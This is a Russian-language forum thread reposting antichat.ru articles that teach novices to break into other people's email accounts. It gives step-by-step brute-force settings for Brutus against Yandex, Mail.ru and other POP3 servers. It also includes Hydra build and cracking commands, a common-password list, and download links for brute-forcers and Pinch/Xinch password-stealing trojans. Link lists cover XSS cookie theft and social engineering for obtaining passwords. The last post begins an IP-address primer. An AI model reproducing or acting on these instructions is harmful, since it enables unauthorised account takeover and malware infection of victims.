Введение в Интернет и безопасность в нем

Расширенная информация об игровой Вселенной.
Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 02 мар 2009, 19:07

<span style="font-style: italic">Статья с форума http://forum.antichat.ru/
За ашипки и очепятки в статьях ответственности не несу.</span>
<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Взлом e-mail<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="display: block; text-align: center"><!--coloro: blue-->[color= blue]<!--/coloro-->ЧАСТЬ 1.<!--colorc-->[/color]<!--/colorc--></span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">"Intro"<!--colorc-->[/color]<!--/colorc--></span></span>
Приветствую каждого кто читает эту статью. От кульного кулхацкера и до тех кто хочет им стать. Статья написана с целью помочь ньюбесам разобраться в принципах взлома почтовых ящиков как с помощью спец. софта созданного для этих целей, так и с помощью "мозгов" так сказать.
В данной статье будут рассмотрены не только принципы взлома почтовиков, но и так же будет отчасти выложен софт необходимый для этого и соответственно линки на видео, которое есть на нашем любимом античате. Так же будет выложен список ЧАВО и пути их решения.
<!--coloro: green-->[color= green]<!--/coloro-->(Все это в конце статьи) <!--colorc-->[/color]<!--/colorc-->
В целом статья ориентирована на то, чтобы у новичков в этом деле не возникало больше вопросов типа "Как взломать мыльник на мэйл.сру?", ибо достали вы уже народ с этими вопросами, поэтому вам и говорят в ваших топиках, что мол тема заезжена и все такое, что приводит к тем ответам на ваши вопросы, которых вы не ожидаете.
Постарайтесь максимально впитать весь материал, который изложен ниже и не задавать глупых вопросов.
Пытайтесь сами решать свои вопросы в плане взлома ибо ][акер есть самоучка.
Итак, приступим.
Существует достаточно много способов взлома почтовых ящиков в не зависимости от того на каком домене они распологаются.
От простого нудного брута до кражи Cookie. Рассмотрим каждый из них подробно.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(1): Брут.<!--colorc-->[/color]<!--/colorc--></span></span>
Брут-это достаточно долгий процесс взлома, если смотреть со стороны. Так сказать, лобовая атака. При этом время, которое можно потратить на взлом этим способом напрямую зависит от чела, которого ты ломаешь. Будь то ламер или вумный юзверь, либо ][ацкер.
Поскольку от образованности чела в этом деле зависит длинна и сложность пассворда, который он поставит себе на почтовик.
Углубимся в этот метод взлома и рассмотрим соответствующий софт, необходимый для этого.
Первой и наиболее распространенной прогой для взлома почтовиков является <!--coloro: aqua-->[color= aqua]<!--/coloro-->BrutusAET2.<!--colorc-->[/color]<!--/colorc-->
Нам потребуется:
1) Программа для переборки паролей BrutusAET2 , которую можно скачать отсюда:
http://rapidshare.de/files/35508241/BrutusAET2.rar.html
2) Словарики ,которые можно взять отсюда:
http://www.passwords.ru/dic.php
http://www.insidepro.com/eng/download.shtml
http://www.outpost9.com/files/WordLists.html
http://www.acolytez.com/dict/
http://www.phreak.com/html/wordlists.shtml
http://www.mobilstar.ru/files/dict/
3) Прямые руки.
К примеру приведу угон мыльника на @yandex.ru.
<!--coloro: lime-->[color= lime]<!--/coloro-->
Настройка программы для переборки паролей BrutusAET2:<!--colorc-->[/color]<!--/colorc-->
1) Открыли программу.
2) В поле Target пишем pop.yandex.ru
3) В поле Type выбираем POP3
<!--coloro: lime-->[color= lime]<!--/coloro-->Connection Options:<!--colorc-->[/color]<!--/colorc-->
1) Port ставим 110.
2) Connections ставим на максимум т.е 60.
3) Timeout ставим на максимум т.е 60
<!--coloro: lime-->[color= lime]<!--/coloro-->POP3 options:<!--colorc-->[/color]<!--/colorc-->
Не трогаем, это для хакеров =)
<!--coloro: lime-->[color= lime]<!--/coloro-->Authentication options:<!--colorc-->[/color]<!--/colorc-->
Если мы хотим брутить список мыльников, тогда нам надо создать текстовик, назовём его users.txt ,туда значит закидываем списки юзеров.
Например:
Vasja_pupkin
Abcdefgh
Abcabc
Лезем в прогу там ставим галочку около Username.
Use Username: указываем путь к списку юзеров.
Переходим к списку паролей…
Создаем значит текстовик words.txt и туда пихаем пароли.
Например:
Password
Pass
123
Лезем в прогу и выбираем
Pass mode : Word list
Pass file : указываем путь к списку паролей.
Если @mail.ru просто ставим в Target : pop.mail.ru и остальное всё тоже самое.
Если @bk.ru просто ставим в Target : pop.bk.ru и остальное всё тоже самое.
Если @list.ru просто ставим в Target : pop.list.ru и остальное всё тоже самое.
Если @inbox.ru просто ставим в Target : pop.inbox.ru и остальное всё тоже самое.
по примерам можно сделать вывод,что если мыло на зоне ааа.ru значит и POP сервер будет pop.ааа.ru
Вобщем всё должно получится как на скриншоте :
Изображение
После всего этого Нажимаем Start и Брут пошёл.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.securitylab.ru/<!--colorc-->[/color]<!--/colorc-->
Программулька достаточно давно живет в инете и получила признание у многих взломщиков. ОДнако в нынешнее время наблюдаются небольшие глюки у этой проги. Например, бывает так, что в процессе брута, если пасс будет стоять в конце (200 место в словаре к примеру), то она может пропустить этот пасс.
Линчо у меня бывало так, что она находила пассворд тока со второго круга а первый раз пропускала. ОДним словом, прога хорошая, многофункциональная. Способная брутить мыльники не зависимо от того, на каком домене распологается почтовик. ОДнако для нее важное значение играет расположение правильного пассворда в словаре.
А именно, его позиция среди других слов. Чем оно ближе, тем для вас же лучше. И это касается не только именно этой проги, но и также остальных. Так что, прежде чем исользовать её, пораскиньте мозгами какие ключевые слова задать перед генерацией словаря.
Для генерации словаря хорошо подойдет <!--coloro: aqua-->[color= aqua]<!--/coloro-->PassWordsPro<!--colorc-->[/color]<!--/colorc-->. Программа кульная, предназначенная не только для генерации слов, но и так же для генерации хешей. Таких как md4, md5, MSCash, Sha-1, MySQL....
ПОлностью описывать все ее функции не буду. Сами разберетесь, когда придет время для расшифровки хешей. Да и объяснение принципов расшифровки и генерации хешей не относится к этой теме.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.insidepro.com/download/passwordspro.zip<!--colorc-->[/color]<!--/colorc-->
Если вышеизложеной информации вам не достаточно по использование Brutus AET2, то вот урл на видео:
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/download_109.html<!--colorc-->[/color]<!--/colorc-->
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(2): Mail_ru_brut_by_Zlo_v3.0.<!--colorc-->[/color]<!--/colorc--></span></span>
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.xakbios.net/<!--colorc-->[/color]<!--/colorc-->
Эта прога даже легче Brutus, если сравнивать их две. КОРоче, постараюсь обьяснить все по пальцам. Тут даже никакого ФАКА не понадобиться. КОроче, значит так. Софтвина эта начинает работать тока когда заходишь на пагу самого Зло.
Ну, точнее вместе с запуском проги запускается пага разработчика. И ни что с этим не поделаешь, уж так наверное захотелось её создателю, чтобы больше народу заходило на его портал. Ну да ладно, ближе к телу. Поле Mail;Pass. Тут ничего менять не стоит. Просто создаешь на системом логическом разделе своего харда текстовичок с названием unr.txt.
Кидаешь туда "куцэ" сгенереные тобой мыльники в таком виде:
Vasya_Pupkin@mail.ru;qwerty.
Vasya_Pupkin@mail.ru;askjdh
Vasya_Pupkin@mail.ru;sakajshds
Ну где тут мейлер а где пасс думаю видно. В поле Save Good а именно в текстовичке ssafsa.txt, который ты должен тож создать на С:/> будут сэйвиться набрученные в процессе взлома пассы на почтовик(и).
Поля Theards и ТimeOut лучше оставь по дэфолту.
1)Position - показывает позицию пасса на котором остановился брут, если сделана пауза.
2) Ну и есессно ты мож брутить ч-з проксю.
Поле Theards соответственно (3), показывает число и скорость потоков в процессе брута.
Да и еще заранее оговорюсь. КАк правило, на паге Zlo предлагается купить не бажную версию данной софтвины с возможностью халявного апдейта. КОнечно можно купить, т.к некоторые версии этой проги не воспринимают русскоязычные слова в процессе брута.
Но вопрос покупки уже стоит перед вами. Если ты сынка банкира, то мож купить. Но думаю даже и таким охота халявы)))
Это мануал подробней некуда....
К вашему сожалению (а может и без сожаления) видео по использованию данной проги нет.
Но а если глянуть со стороны, что тут сложного. И без видео думаю справиться можно.
Софт с помощью которого можно сгенерить брут-лист наз-ся UIN Generator.
Так же, с помощью данной софтвинки можно сгенерить и листы пассов для брута асек.
Но это уже другая тема.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.proxy-forum.org/files/ic...n/generator.rar <!--colorc-->[/color]<!--/colorc-->
В поле номер (Один уин) вписываем мыло жертвы. В поле (Пароль), расположенное ниже отмечаем галочку на "словарь" и задаем путь к словарю, который вы хотите использовать для брута мыльника.
После всего этого нажимаем генерировать (на поле "Один номер") и пойдет процесс составления брут-листа.
Так, поехали дальше.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(3): Duk3NN Mail Bruter 3.03 F I N A L edition.<!--colorc-->[/color]<!--/colorc--></span></span>
В принципе, программулька не плохая. Может кто ее юзал чаще меня возразит. Но это его право и осуждать его и уж падавно спорить с ним не буду. Ибо каждый при своем мнении.
Познакомимся с ней поближе.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://jerimi-3434.narod.ru/mb303final.rar<!--colorc-->[/color]<!--/colorc-->
Здесь есть несколько вкладок. На вкладке <!--coloro: lime-->[color= lime]<!--/coloro-->Process<!--colorc-->[/color]<!--/colorc--> отображается непосредственно сам процесс брута.
Число потоков, используемых проксиков,лог брута и др. На этой вкладке и осуществляется запуск процесса брута.
Следующая вкладка <!--coloro: lime-->[color= lime]<!--/coloro-->Brute Options<!--colorc-->[/color]<!--/colorc-->. Тут задаются параметры для брута.
Тут можно брутить как с загрузкой mail;pass листа как в Mail.ruBrute, так и задав домен на котором находится почтовик жертвы.
Отличием этой проги то двух представленных выше является то, что тут можно загрузить лист прокси а не менять его в ручную каждый раз, когда это необходимо как, например в Mail.ruBrute. Не говоря уже о Brutus, которая работает вообще тока через Socks v4, v5.
@Mail.ru брутфорс.
===========================================
Описание файла настроек
-----------------------
[Item <порядковый номер>]
Title=<Название>
Host=<Хост>
Req=<Запрос (строчки в заросе разделяются знаком # Например: Req=POST mailserver.com HTTP/1.0#Referer: mailserver.com>
Data=<Информация отправляемая серверу>
Bytes=<Кол-во принимаемых байт>
Good=<Признак нужного ответа>
%login% - Заменяется на имя пользоавтеля
%pass% - Заменяется на пароль
%login% И %pass% могут быть в Req и Data одновременно.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(4): Nextmail.ru Bruteforce.<!--colorc-->[/color]<!--/colorc--></span></span>
Брутфорс для подбора паролей к почтовым ящикам на nextmail.ru включая поддомены:
nextmail.ru
nxt.ru
email.su
russian.ru
xaker.ru
students.ru
mail2k.ru
dezigner.ru
programist.ru
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.xicq.org/pub/icq/brutefo..._bruteforce.rar<!--colorc-->[/color]<!--/colorc-->
Программулька проста в освоении. И не освоить ее может тока самый последний ламер. Поля Theards, Remains и Processed мы рассматиривать не будем. В этом нет надобности, потому что значение этих полей такое же как и в Mail.ru Brute.
Рассмотрим поля ниже. Хотя они такие же как в Mail.ru Brute, но коль уж я сказал про них, то приступим. Поле Inlist. Тут задается путь к брут-листу, который будет в виде блаблабла@nextmail.ru;мухосранск.
Гинерить его думаю догадываетесь чем. (Пасс-лист)
Поле Good. Тут задается путь к тестовичку в который будут скидываться правильно набрученные пароли.
Theards: потоки (соответственно)
Autosave: порядок сохранения работы в процессе брута.
После задания всех настроек жмем OK и start. И пляшем с музыкой и бубнами, чтобы брут оказался удачным.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(5): Yandex Mail Bruteforcer.<!--colorc-->[/color]<!--/colorc--></span></span>
Программулька достаточно примитивна, поэтому не вижу надобности описывать че куда записывать.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: <span style="font-style: italic">[хз - пробивайте по Гуглу. *примеч. Kestrel]<!--colorc-->[/color]<!--/colorc--></span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(6): Hotmail bruteforce.<!--colorc-->[/color]<!--/colorc--></span></span>
Прога, которая хорошо чебя зарекомендовала во взломе почтовиков всем известного домена Hotmail.
Ну, описывать ее я не буду, потому что принцип действия у неё такой же, как и у таких прог этого семейства (Nextmail bruteforce и др.)
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
Скачать: http://jerimi-3434.narod.ru/hotmail.rar<!--colorc-->[/color]<!--/colorc-->
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(7): Earthlink.net bruteforce.<!--colorc-->[/color]<!--/colorc--></span></span>
Программа для перебора паролей на знаменитом почтовом сервисе earthlink.net, включая все его поддомены.
Если мыло давно не использовалось, то оно замораживается, и если у вас не получается зайти в почту, используя сбрученный логин и пасс, то этот аккаунт скорее заблокирован, чем программа дала сбой.
Проверить емейл на пригодность можно тут:
<!--coloro: yellow-->[color= yellow]<!--/coloro-->(https://myaccount.earthlink.net/cam/tra … &add=1)<!--colorc-->[/color]<!--/colorc-->
Принцип работы такой же, как и у вышепредставленной проги.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://lifar.com.ru/content/uploads/erth.rar<!--colorc-->[/color]<!--/colorc-->
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_1(8): Hydra.<!--colorc-->[/color]<!--/colorc--></span></span>
Сразу оговорюсь для новичков. Чтобы юзать эту прогу для взлома мыльников нужно иметь шелл. ЧТо такое шелл и с чем его едят думаю вас известно. Но если нет, то вот вам небольшой манульчик:
<!--coloro: aqua-->[color= aqua]<!--/coloro-->
Shell-аккаунт - что это?<!--colorc-->[/color]<!--/colorc-->
Тык!
Hydra в основном используется для взлома, когда имеется шелл. Чтобы заиметь шелл, нужно похатчить
сервант. Как вы будете это делать это уже ваша забота. К тому же описание получения шелла будет
выходить за рамки этой статьи.
Как правило она используется и работает под Linux или Unix. Одним словом на любой никсовой ОС.
Версия для Unix'a/Linux'a.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->
Скачать: http://thc.org/download.php?t=r&f=h … src.tar.gz
Сорцы: http://jerimi-3434.narod.ru/hydra-5.3-src.tar.gz
<!--colorc-->[/color]<!--/colorc-->
Но так же есть и версия под форточки (Win). Такую версию хорошо юзать, если имеешь бычью скорость инета.
<!--coloro: fuchsia-->[color= fuchsia]<!--/coloro-->Версия для Windows.<!--colorc-->[/color]<!--/colorc-->
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/download_110.html<!--colorc-->[/color]<!--/colorc-->
Как заливать на шелл Гидру, ньюбесам думаю будет интересно. Поэтому я выложу последовательность заливки на шелл. Хотя описание где-то было на ачате. Ну да ладно, принцип один.
Сначала стянем архив.
wget http://thc.org/download.php?t=r&f=h … src.tar.gz
Распаковываем
gzip -d hydra-4.7-src.tar.gz
tar -xf hydra-4.7-src.tar
или
tar -xzf hydra-4.7-src.tar.gz
И ставим
cd hydra-4.7-src
./configure
make
make install
можно копирнуть назад и удалить исходники
cp hydra ..
cd ..
rm -rf hydra-4.7-src
Работаем
./hydra (для справки)
./hydra -l lamer -P pass.txt -w 20 -t 10 pop.server pop3
для подбора пароля из словаря pass.txt к логину lamer
на сервере pop.server, timeout=20 sec, потоков 10.
================================================== ==============
Приведу список наиболее часто используемых паролей для почтовиков:
12345 0000
123456 000000
1234567 111
12345678 1111
123456789 11111
1234567890 11111
0987654321 111111
1029384756 123
192837465 123123
11111 123321
123123 1234
666999 12345
999666 123456
qwerty 1234567
admin 123654
adminpass 4444
qweqwe 555
qweqweqwe 55555
asdf 555555
asdfg 654321
pass 666
password 666666
parol 666999
hack 777
hacker 7777
hackme 777777
keyboard 7777777
access
========================================
Тут можно скачать словари для брута.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать:
1) http://advlamer.narod.ru/brute.htm
2) http://advlamer.narod.ru/dict/advlamer-digits.rar
3) http://www.hackersplayground.org/wordlists.html
4) http://passcrack.spb.ru/modules/Fil...c/passcrack.rar
5) http://advlamer.narod.ru/dict/advlamer-digits.rar
6) http://freeware32.ru/index.php?program= … onary_Tool
7) http://www.passwords.ru/dic.php
8) ftp://ftp.cerias.purdue.edu/pub/dict/<!--colorc-->[/color]<!--/colorc-->
<span style="display: block; text-align: right">to be continued...</span>

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 03 мар 2009, 20:09

<span style="font-style: italic">Статья с форума http://forum.antichat.ru/
За ашипки и очепятки в статьях ответственности не несу.</span>
<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Взлом e-mail<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="display: block; text-align: center"><!--coloro: blue-->[color= blue]<!--/coloro-->ЧАСТЬ 2.<!--colorc-->[/color]<!--/colorc--></span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_2(1): XSS.<!--colorc-->[/color]<!--/colorc--></span></span>
Что такое XSS я в этой статье подробно расписывать не буду по причине того, что материала на эту тематику предостаточно на античате. Здесь большей частью будут собраны линки на статьи, топики и видео, где рассмотрены основные принципы эксплуатации этой и других узвимостей почтовых служб.
Ну, ближе к телу.
++++++++++++++++++++++++++++++++++
<span style="font-size: 16px"><!--coloro: lime-->[color= lime]<!--/coloro-->Видео<!--colorc-->[/color]<!--/colorc--></span>
XSS на mail.ru.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/file213.html<!--colorc-->[/color]<!--/colorc-->
XSS на hotmail.com.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/file213.html<!--colorc-->[/color]<!--/colorc-->
Уязвимости почтовой службы yahoo.com.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/file181.html<!--colorc-->[/color]<!--/colorc-->
Уязвимости почтовой службы mail.ru.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/file180.html<!--colorc-->[/color]<!--/colorc-->
XSS на zhuki.mail.ru.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/file172.html<!--colorc-->[/color]<!--/colorc-->
Взлом ящика на nm.ru.
<!--coloro: olive-->[color= olive]<!--/coloro-->Скачать: http://video.antichat.ru/download_52.html
<!--colorc-->[/color]<!--/colorc-->
Взлом ящика на e-mail.ru.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/download_51.html<!--colorc-->[/color]<!--/colorc-->

Как получить чужие письма на рамблере.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/download_113.html<!--colorc-->[/color]<!--/colorc-->

Перехват сессии на сервере pochta.ru.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/download_8.html<!--colorc-->[/color]<!--/colorc-->
XSS на почте Yandex.Ru
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://video.antichat.ru/download_4.html<!--colorc-->[/color]<!--/colorc-->
++++++++++++++++++++++++++++++++++++++++
<span style="font-size: 16px"><!--coloro: lime-->[color= lime]<!--/coloro-->Статьи<!--colorc-->[/color]<!--/colorc--></span>
Активная XSS на mail.ru
http://forum.antichat.ru/thread11318.html
Активная XSS на http://pochta.ru/
http://forum.antichat.ru/thread28645.html
XSS mail.ru rambler.ru
http://forum.antichat.ru/thread28497.html
Xss для новичков
http://forum.antichat.ru/thread20140.html
XSS, SQL-inj, PHP-inj и др. на примере phpBB
http://forum.antichat.ru/thread20191.html
Пачка пассивных XSS на neora.com
http://forum.antichat.ru/thread21437.html
XSS + Feik
http://forum.antichat.ru/thread27344.html
Зачем Cookie нужен
http://antichat.ru/txt/old/cookie.shtml
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ
http://antichat.ru/txt/hmail/
CGI-сниффер
http://antichat.ru/sniff/
Подборка сайтов по CSS, XML технологиям и Web2.0 решениям
http://forum.antichat.ru/thread18709.html
При помощи XSS кража cookies - Или новички сюда.
http://forum.antichat.ru/thread25933.html
Баги на Почте.ру
http://forum.antichat.ru/thread24000.html
Проводим XSS без javascript
http://forum.antichat.ru/thread13949.html
Реализация XSS на rambler.ru
http://forum.antichat.ru/thread24130.html
Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru)
http://forum.antichat.ru/thread5423.html
XSS крупным планом.
http://forum.antichat.ru/thread11807.html
XSS на www.pochta.ru
http://forum.antichat.ru/thread12124.html
Захват ящика на e-mail.ru
http://forum.antichat.ru/thread5556.html
Захват ящика на pochta.ru
http://forum.antichat.ru/thread5899.html
В целом, прочитав весь этот материал и просмотрев видео уже и так думаю все будет понятно где и как эксплуатировать эти уязвимости.
================================================== ===================
<span style="display: block; text-align: center"><!--coloro: blue-->[color= blue]<!--/coloro-->ЧАСТЬ 3.<!--colorc-->[/color]<!--/colorc--></span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_3(1): Трои.<!--colorc-->[/color]<!--/colorc--></span></span>
Я думаю перед каждым из нас, когда приходит нужна взломать чей-нить мыльник встает вопрос. Как ломать? Некоторые подумают сразу-Трой. И подумают правильно. Ибо нет проще метода кинуть троя жертве и получить заветные пассы на мыльник или аську.
Не буду рассказывать про то, как настраивать трои для их функциональности. За меня это сделали раньше.
Но все же приведу линки по которым можно будет скачать троя по вашему вкусу.
============================
Xinch v_1.5
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://www.zm-team.h17.ru/Files/pinch-xinch/Xinch.rar<!--colorc-->[/color]<!--/colorc-->
Pinch 2.58
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://narod.yandex.ru/100.xhtml?zm.../pinch_2.58.rar<!--colorc-->[/color]<!--/colorc-->
Pinch 2.59
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://forum.antichat.ru/thread28335.html<!--colorc-->[/color]<!--/colorc-->
Pinch 1.0
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Скачать: http://jerimi-3434.narod.ru/pinch1.0.rar<!--colorc-->[/color]<!--/colorc-->
+++++++++++++++++++++++++++++++
<span style="font-size: 16px"><!--coloro: lime-->[color= lime]<!--/coloro-->Видео.<!--colorc-->[/color]<!--/colorc--></span>
Конфигурирование и использование трояна Xinch.
http://video.antichat.ru/file174.html
Рассказ о трояне Пинч 1.0
http://video.antichat.ru/file85.html
+++++++++++++++++++++++++++++++
<span style="font-size: 16px"><!--coloro: lime-->[color= lime]<!--/coloro-->Статьи.<!--colorc-->[/color]<!--/colorc--></span>
Троянизация на коленке.
http://forum.antichat.ru/thread14498-Xinch.html
Хинч по хттп - для новичков.
http://forum.antichat.ru/thread21767-Xinch.html
Настройка троянов Xinch/Pinch. Все вопросы по пинчу только в этом теме!
http://forum.antichat.ru/thread19273.html
Инструкция по Pinch 1.0
http://forum.antichat.ru/thread24564.html
================================================== ========================
<span style="display: block; text-align: center"><!--coloro: blue-->[color= blue]<!--/coloro-->ЧАСТЬ 4.<!--colorc-->[/color]<!--/colorc--></span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_4(1): СИ (СОЦ. ИНЖЕНЕРИЯ)<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-size: 16px"><!--coloro: lime-->[color= lime]<!--/coloro-->Статьи.<!--colorc-->[/color]<!--/colorc--></span>
Седьмая нота. СИ и её практическое применение.
http://forum.antichat.ru/thread25546.html

КАК ПИСАТЬ ПИСЬМА> В ПОМОЩЬ СОЦИАЛЬНОМУ ИНЖЕНЕРУ
http://forum.antichat.ru/thread10865.html

СИ + Pinch (для новичков)
http://forum.antichat.ru/thread14387.html

Методы СИ
http://forum.antichat.ru/thread19659.html

Как узнать пароль (СИ)
http://forum.antichat.ru/thread16545.html

Ещё раз о СИ
http://forum.antichat.ru/thread15052.html

Как узнать код доступа (СИ)
http://forum.antichat.ru/thread14653.html

Как получить пароли(СИ)
http://forum.antichat.ru/thread8171.html
================================================== ===
<span style="display: block; text-align: center"><!--coloro: blue-->[color= blue]<!--/coloro-->ЧАСТЬ 5.<!--colorc-->[/color]<!--/colorc--></span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="font-size: 14px">НАМБА_5(1): "ЧАВО".<!--colorc-->[/color]<!--/colorc--></span></span>
КАк правило, даже при уже разжеваных по самое не хочу методов взлома почтовиков, у ньюбесов возникают различные вопросы типа "У меня не получается то-то или это, помогите". Не знаю с чем бы это может быть связано. Но думаю у каждого из нас, кто только-только начинал и вступал на тропу человека, который за свободу информаци, возникало множество вопросов. Кто-то решал их сам а кто-то просил помощи у ближнего, который знал (знает) как решить тот или иной вопрос.
Смотрю философией начинает попахивать. Перейдем сразу к делу.
Ниже будет приведен список ЧАВО (список часто задаваемых вопросов (Это касается новичков.
Привыкаете к соответствующим названиям)). И соответственно, пути их решения.
Расписывать сами вопросы и ответы на них я не стал. Но чтобы вы "НОВИЧКИ" не задавали один и тот же вопрос по несколько раз участникам форума, которым думаю уже начинают сниться вопросы "КАк взломать мыло?" или "КАК настроить троян?" так же, как и мне. Вот вам список ЧАВО.
нужны прокси для брута мыла!?
http://forum.antichat.ru/thread27186.html

DukeNN Mail Bruter 3.03
http://forum.antichat.ru/thread26810.html

Проблемка с Брутом
http://forum.antichat.ru/thread26383.html

Обясните
http://forum.antichat.ru/thread26164.html

Есть проблема с брутусом...насчет прокси...
http://forum.antichat.ru/thread26230.html

Не понимаю с Brutus!
http://forum.antichat.ru/thread26184.html
Ну вот пожалуй и все. Все методы взлома почтовиков, которые являются наиболее часто используемы, рассмотрены.
В этой статье все разжевано. Осталось только положить все в рот и дать по кадыку, чтобы все это провалилось внутрь и у вас "НОВИЧКОВ" не возникало больше подобных вопросов.
<!--coloro: aqua-->[color= aqua]<!--/coloro--><span style="font-style: italic">И да прибудет с вами root.<!--colorc-->[/color]<!--/colorc--></span>

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 05 мар 2009, 16:27

Значит так, товарищи ШурСтраКосы, две статьи выше - это было творческое вступление, авторские тренировки речи, а теперь я серьезно объясню смысл данного топика. Итак, каждый ШурСтраКос по определению крутой, как Аль-Асвад. НО! Крутость ШурСтраКоса измеряется по трем уровням:
<!--coloro: red-->[color= red]<!--/coloro-->1.<!--colorc-->[/color]<!--/colorc--> Уровень физической силы.
<!--coloro: red-->[color= red]<!--/coloro-->2.<!--colorc-->[/color]<!--/colorc--> Уровень интеллекта (сюда входят не только знания, получаемые вами в вузах, или умение правильно взорвать планету, но еще и уровень компьютерной образованности).
<!--coloro: red-->[color= red]<!--/coloro-->3. <!--colorc-->[/color]<!--/colorc-->Внешние данные =)
<!--coloro: red-->[color= red]<!--/coloro-->4. <!--colorc-->[/color]<!--/colorc-->Уникальная особенность (у каждого шурСтраКоса обязательно есть своя "изюминка", которая делает его уникальным).
Поговорим конкретно о втором пункте.
Каждый, несомненно, считает себя самым умным. Каждый ШурСтраКос должен не только хорошо учиться в школе/универе =), но еще и быть в теме его "профессиональных" тем. В нашем случае это темы научной фантастики. Но какая же наука и космотехнологии могут быть без универсального изобретения манчкинов Вселенной - компьютеров? Компьютерная образованность - важнейшая составляющая крутости ШурСтраКоса. А теперь представьте себе Дарта Вейдера, который не умеет ломать Мэйл.Ру (Голонет.Ру). Представили?
Ну какой же ШурСтраКос может быть суперкрутым, если он ничего не смыслит в веб-хакинге? Теперь у всех ШурСтраКосов есть уникальный шанс повысить уровень свой мегакрутости, ознакомившись со статьями юзеров Античата.
В эту тему будут выкладываться самые интересные и наиболее полезные статьи. Удачи вам в повышении уровня компьютерной грамотности! =)

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 05 мар 2009, 16:41

Итак, поехали! Вышеописанные способы взлома почтовых ящиков - это вам для тренировки). А теперь приступим к теории.
<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->IP-адрес<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - хз кто.</span>
<!--coloro: yellow-->[color= yellow]<!--/coloro-->IP-адрес  <!--colorc-->[/color]<!--/colorc-->(aй-пи адрес, сокращение от англ. Internet Protocol Address) — уникальный идентификатор (адрес) устройства (обычно компьютера), подключённого к локальной сети или интернету.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->IP-адрес<!--colorc-->[/color]<!--/colorc--> представляет собой 32-битовое (по версии IPv4) или 128-битовое (по версии IPv6) двоичное число. Удобной формой записи IP-адреса (IPv4) является запись в виде четырёх десятичных чисел (от 0 до 255), разделённых точками, например, 192.168.0.1. (или 128.10.2.30 — традиционная десятичная форма представления адреса, а 10000000 00001010 00000010 00011110 — двоичная форма представления этого же адреса).
